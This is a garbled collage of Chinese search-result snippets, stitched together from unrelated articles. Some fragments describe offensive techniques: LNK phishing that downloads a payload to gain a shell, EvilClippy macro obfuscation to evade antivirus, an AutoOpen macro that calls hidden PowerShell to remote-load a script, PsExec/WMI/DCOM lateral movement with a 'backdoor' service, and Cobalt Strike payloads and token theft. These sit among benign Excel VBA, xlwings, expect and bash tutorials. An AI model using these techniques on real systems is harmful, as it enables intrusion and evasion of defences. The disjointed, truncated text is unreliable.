lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。...当受害者双击之后就会自动执行我们的恶意payload,从目标网站下载并执行。 最终被得到 shell。...EvilClippy.exe -g macrofile.doc 撤消由hide选项(-g)完成的更改,以便我们可以在VBA IDE中调试宏。...请注意,VBA项目版本必须与主机程序匹配才能执行P代码 EvilClippy.exe -s 1.vba macrofile.doc 参数说明:-s 参数是通过假的 vba 代码插入到模块中,用以混淆杀毒程序...可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用
如果端点安全产品支持AMSI,并且检测到该字符串, 那么PowerShell提示符将显示错误,表明输入的命令是恶意的。 ? 很好Amsi查杀并阻止了power shell执行命令。...4.amsi停止宏执行并从循环缓冲区取出内容传递。 5.amsi从循环缓冲区取出内容传递给杀毒软件。 6.杀毒软件拿到数据后判断宏是否为恶意的。 6.如果行为是无恶意的,那么宏可以执行。...VBA 脚本引擎通过实现调用者和被调用者之间转换的内部接口处理从宏代码到 COM 和 API 的调用。...该协议允许 VBA 运行时向反病毒系统报告它即将执行的某些高风险代码行为,并允许反病毒在观察到的行为序列表明可能存在恶意活动时向进程报告,以便 Office应用程序可以采取适当的行动。...2.使用宏远程加载我们的恶意代码 #使用宏调用powershell远程加载ps1 Sub AutoOpen() Call Shell("powershell -Sta -Nop -Window
然后让跳板机使用copy命令远程操作,将metasploit生成的payload文件Gamma.exe复制到目标主机DC系统C盘中。 3. 再在目标主机DC上创建一个名称为“backdoor”的服务。...执行原理: 1.通过ipc$连接,copy psexecsvc.exe到目标机器 2.通过服务管理SCManager远程创建psexecsvc服务,并启动服务。...2.如果提供了账号密码,则用这个账号密码建立一个到目标的IPC连接。 3.WMI会建立一个共享文件夹,用于远程读取命令执行结果。...(使用这个工具需要明文密码) Winrs.exe 是一个内置的命令行工具,它允许远程命令的执行在WinRm的适当的有资格的用户。...注意: 可以将“ Shell.Application”(已加载的shell32.dll中实现)对象替换为“ Wscript.Shell”. 7.Excel XLL (Excel进程加载恶意的DLL) XLL
有时候,我们可能想要从Python运行Excel VBA宏,特别是当想要运行已有的Excel宏时,这很有用——甚至可以在不打开Excel文件的情况下执行这些VBA宏。...注意,要安装py32win库,在命令提示符下键入以下命令: pip install pywin32 然而,要在Python中导入该库,则其名字成为win32com.client: import win32com.client...Excel VBA宏 下面是一个非常简单的Excel VBA宏,它接受一个参数,在工作表Sheet1的单元格B2中输入一条问候语。...然后,打开这个包含VBA宏的Excel文件,并将其赋给变量wb。...3.mymacro("完美Excel"):宏名,注意到这里传递参数到VBA。
你可以通过使用 mkdir 命令解决这个问题: ? 安装好一切: ? 4 启用xlwings的用户定义函数 首先我们需要加载 Excel 外接程序: ?...最后,我们需要启用对 VBA 项目对象模型的信任访问。你可以通过导航到文件选项信任中心设置宏来做到这一点: ?...6 从VBA到Python 在我们开始编码之前,让我们首先确保在同一个页面上。打开Excel VBA 编辑器,点击 Alt + F11。返回以下屏幕: ?...例1:在Excel外部操作,并返回输出。 在本例中,我们将看到如何在Excel之外执行操作,然后在电子表格中返回结果。...我们将从CSV文件中获取数据,对这些数据进行修改,然后将输出传递到Excel: 首先,VBA代码。
先抛出一个问题 现在有两台Linux主机A和B,如何从A主机ssh到B主机,然后在B主机上执行命令,如何使这个过程实现全程自动化?...比如我们使用spawn、send和expect命令完成了ftp登陆主机,执行下载文件任务,但是我们希望在文件下载结束以后,仍然可以停留在ftp命令行状态,以便手动的执行后续命令,此时使用interact...expect内部命令,如果没有装expect或者直接在默认的SHELL下执行是找不到spawn命令的。...如果没有这一句登录完成后会退出,而不是留在远程终端上。...传参 很多时候,我们需要传递参数到脚本中,现在通过下面这段代码来看看如何在expect中使用参数: #!
使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意的宏来将payload注入到内存中。...executable(生成可执行攻击脚本) powershell(生成一个powershell的脚本) VBA(生成一个vba的脚本,使用mshta命令执行) 这里借鉴一个网上的方法,生成一个powershell...以Powe rshell Command为例,生成的payload为一串命令,只要在主机上执行这一串命令(主机需安 装Powe rshell), cs即可收到主机的beacon ?...你可以使用这个可执行文件来作为使用sc命令起的Windows服务的调用程序,或使用Metasploit框架的PsExec模块生成一个自定义的可执行文件。...81. ssh-key 使⽤密钥连接远程主机 82. steal_token 从进程中窃取令牌 83. timestomp 将⼀个⽂件的时间戳应⽤到另⼀个⽂件 84. unlink Disconnect
控件: image.png 下图显示了功能区中被禁用的“复制”、“剪切”、“加粗”和“下划线”控件已变成灰色: image.png 虽然在功能区中被禁用的控件是灰色的,但你仍然可以通过快捷键组合执行它们中的一些命令...示例XML代码: image.png 在Excel中打开该工作簿时,自动执行Initialize回调和GetEnabledAttnSh回调。...如果控件的id与参数值匹配,就启用该控件。否则,禁用该控件。...说明:本专题系列大部分内容学习整理自《Dissectand Learn Excel VBA in 24 Hours:Changingworkbook appearance》,仅供学习研究。...注:如果你有兴趣,你可以到知识星球App的完美Excel社群下载这本书的完整中文版电子书。 欢迎在下面留言,完善本文内容,让更多的人学到更完美的知识。
因为本身是在日企工作,所以对Excel有着特别的情感,索性就决定先从Excel开始吧。 今天的第一篇连载面向编程初学者,从零开始说明如何利用Excel宏命令/VBA来实现业务自动化。...追加数据,处理复杂的数值运算等,相比于手动运算,使用VBA自动化处理能够明显地缩短时间。以前需要加班才能做完的工作,很可能在上班时间就能处理完。按时下班,多点儿时间做自己的事情,多爽!...(当然,不用宏,直接使用VBA从零开始变成也是可以的) 在Excel中启用宏所必须的设定 只要点击打开[开发工具]选项卡就能开始录制宏命令。...(当然,是使用编程语言来描述的)(图11) 图11 图12 执行Excel宏命令的3种方法 现在我们开始尝试执行一下宏命令。 单击[开发工具]选项卡中的宏,就会打开宏命令对话框。...选择想要执行的宏「复制粘贴」后,单击[执行]按钮(图13)。 图13 你会发现,宏命令开始执行,数据被复制粘贴了。见图14 图14 频繁使用宏命令时,每次都要从「宏一览」中执行是很麻烦的。
二、Bash Shell 的基本操作技巧 1、查看前一次登录执行过的命令:vim ~/.bash_history 2、命令和文件补全功能(Tab键) tab 接在一串指令的第一个字后面,则为命令补全 tab...; 可以让两个命令连续执行: && 前一个指令必须没有错误信息 || 如果正确就不执行第二条。...shell script 用在系统管理上面是很好的一项工具,但是用在处理大量数值运算上,就不够好了,因为shell scripts的速度较慢,且使用的CPU资源较多,造成主机资源的分配不良。...注意点:和传统语言不同,函数必须定义在脚本最前面,以便程序执行的时候可以认识函数。...函数 形参 也是用${1}、${2}、${3} 来传参,也就是说函数内的${1}/${2}/${3} 辨认的调函数时传进去的实参。而不是 执行脚本传递时的参数
excelperfect 引言:这是在知识星球App的完美Excel社群中发表的Excel VBA编程系列文章中的一篇,使用一个示例来讲解用户窗体的基础应用。...如果该键可以接受,则将其传递;否则取消。 在VBA联机帮助中的KeyCode值列表中,你可以看到键0到9的代码值为48到57。...重申一下,这是命令按钮应该执行的操作: “下一步”按钮验证数据。如果验证成功,则将数据输入工作表中,并清除该窗体以输入下一个地址。如果验证失败,则窗体将保留其数据,以便用户可以根据需要进行更正。...2.命名窗体初始化代码可能执行的一项任务。 3.在哪个事件下放置限制输入到文本框控件中的某些字符的代码?...VBA学习信息 本文为知识星球:完美Excel社群正在陆续推出的《Excel编程周末速成班》系列中的一篇,到2020年12月27日,此系列已更新至第21课。
学习Excel技术,关注微信公众号: excelperfect 写在开头的话:本系列从第133篇开始的22篇文章,都是翻译改编自fastexcel.wordpress.com的Making your VBA...然而,随着自已研究VBA的深入,不由得佩服老外对VBA研究的深入,此时刚好Excel VBA解读系列又写到自定义函数这里,正好拿出来,边研究并翻译分享给大家。...在有些情况下,当希望仅计算一次自定义函数时,Excel却会计算自定义函数多次。如果你的自定义函数需要执行很长时间,那么这可能是一个重大问题。...例如,如果所有参数都被定义为Double,那么Excel将在参数传递给用户定义函数之前尝试将参数强制转换为Double,如果参数实际引用了未计算的单元格,则不会调用用户定义函数。...如果用户定义函数执行起来很慢,那就不好了! 可以通过检查标准命令栏是否已启用来检测函数向导是否已调用用户定义函数。
你可以使用xlwings+Python执行下列任务: 1.使用Python自动化Excel,例如生成报告。 2.使用Python编写宏,并通过单击按钮从Excel运行。...Python程序,可以从Excel执行。...该函数必须返回某些内容,以便将返回的值传递到Excel中。...图12 注意到,当键入函数时,square实际上会显示在函数列表中——我们可以像使用Excel内置函数一样使用Python函数,并且可以将单元格引用传递到函数中。...首先,到“信任中心”的“宏设置”选项卡中,选取“信任对VBA工程对象模型的访问(V)”前的复选框,如下图13所示。
例如,为了更容易从Internet上的源获取数据,可以安装Requests包来访问一组功能强大但易于使用的命令。要安装它,可以使用Python的包管理器pip,它可以在命令提示符或终端上运行。...缺少对科学计算的支持是VBA的一个明显限制。但是,即使看看核心语言特性,VBA也落后了,这在下一节中会看到。 现代语言特征 自Excel 97以来,VBA语言在语言特性方面几乎没有任何重大变化。...然而,这并不意味着VBA不再受支持:Microsoft在每一个新版本的Excel中都会提供更新,以便能够自动化该版本中引入的新Excel功能。...服务器允许你的代码按计划执行,并使你的应用程序可以从想要的任何地方访问,并具有你需要的计算能力。事实上,在下一章中,我将通过介绍托管的Jupyter笔记本,向你介绍如何在服务器上运行Python代码。...通过学习如何将Excel与Python相结合,你可以在这两个方面都获得优势,并通过自动化节省时间,且因为遵循编程最佳实践更容易而犯更少的错误,此外,如果需要,将能够在Excel之外扩展应用程序。
,但是我无法通过DCOM查询到CLSID或者是ProgID,所以没法判断DCOM能够执行什么功能 2、使用DCOM执行任意命令 首先要一个管理员权限的shell ?...加载powershell拓展,以便使用powershell命令 ?...调用Excel.Application远程执行命令 # 通过PowerShell与DCOM进行远程交互,创建Excel.Application对象的实例: $com = [activator]::CreateInstance...调用ShellBrowserWindow远程执行命令 适用于Windows 10和Windows Server 2012 R2等版本的系统 # 通过PowerShell与DCOM进行远程交互,创建Excel.Application...通过Outlook创建Shell.Application对象来实现命令行执行 # 通过PowerShell与DCOM进行远程交互,创建Visio.Application对象的实例: $com =[activator
先来解释下什么是Excel vba宏 ⭐Excel VBA宏(Visual Basic for Applications)是一种用于在Microsoft Excel中自动化和扩展功能的编程语言。...VBA允许用户编写自定义的脚本或宏,以便通过执行一系列指令来自动完成特定任务。 使用Excel VBA宏,你可以创建和编辑工作表、处理数据、执行计算、生成报表、自定义用户界面等。...你可以在Excel中的"开发者"选项卡中访问VBA编辑器,其中可以编写、修改和运行VBA宏。...案例1 比如我的需求是:写一个基本的Excel vba宏,用于将表格中的第3行到第9行每一行数据转换为一个新的工作簿 VBA宏如下: Sub SplitRowsToNewWorkbooks()...表格文件哦) 6️⃣执行完,打开刚刚设置的路径文件,程序执行pass~~ 虽然chatGPT没有理解我的命令是“每一行”生成新表格,但“回炉再造”一遍就好,重要的是学会ChatGPT与Excel
因此,无论哪个Excel工作簿处于活动状态,引用都能正常工作。 Excel功能区中的复制命令 在使用VBA代码复制单元格区域之前,看看Excel功能区中的“复制”按钮命令。...“复制”按钮是一个拆分按钮,也就是说,可以直接单击该按钮执行复制操作(如下图1所示),也可以单击其右侧下拉箭头,会显示2个命令(如下图2所示)。...图1 图2 在VBA中,如果使用常规的“复制”命令,则使用Range.Copy方法;如果使用“复制为图片”命令,则使用Range.CopyPicture方法。...在Excel中手工复制单元格区域操作时,使用Ctrl+C快捷键,该单元格区域被复制到剪贴板。在VBA中,使用Range.Copy方法做同样的事情。...示例1:复制单元格区域到剪贴板 首先,让我们看看如何将示例工作表(表和单价)中的所有项目复制到剪贴板。
在VBA用户自定义函数中处理此问题的标准方法是获取整列引用和已使用单元格区域的交叉区域,以便用户自定义函数只需处理实际使用的整列的一部分。...下面的示例VBA代码处理交叉区域,然后返回输入区域中的行数和已使用区域中的行数的较小者。...,但对于具有大量已使用单元格区域,肯定会感觉到其速度变量了。...执行此操作的一种方法是使用Application对象的AfterCalculate事件(在Excel 2007中引入)清空缓存。...注意,只能在Excel 2002及更高版本的用户自定义函数中使用Range.Find,并且除了命令宏或COM之外,不能在XLL中使用Find方法。
很喜爱VBA,喜欢使用她对Excel操作实现所需的功能,更喜欢使用VBA控制Excel以及实现结果后的那种感觉。...代码,配以简短的说明,有些例子可能配以必要的图片,以便于理解; ■ 您可以对这些实例进行扩充或组合,以实现您想要的功能或更复杂的操作。...---- VBE编辑器及VBA代码输入和调试的基本知识 在学习这些实例的过程中,最好自已动手将它们输入到VBE编辑器中调试运行,来查看它们的结果。...在执行程序后,必须在Excel工作表中查看所得到的结果。可以用鼠标单击VBE编辑器左上角的Excel图标或者是按Alt+F11组合键切换到Excel界面。...2003高级VBA编程宝典 (2)Excel 2003与VBA编程从入门到精通(中文版) (3)巧学巧用Excel 2003 VBA与宏(中文版) (4)ExcelVBA应用程序专业设计实用指南
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
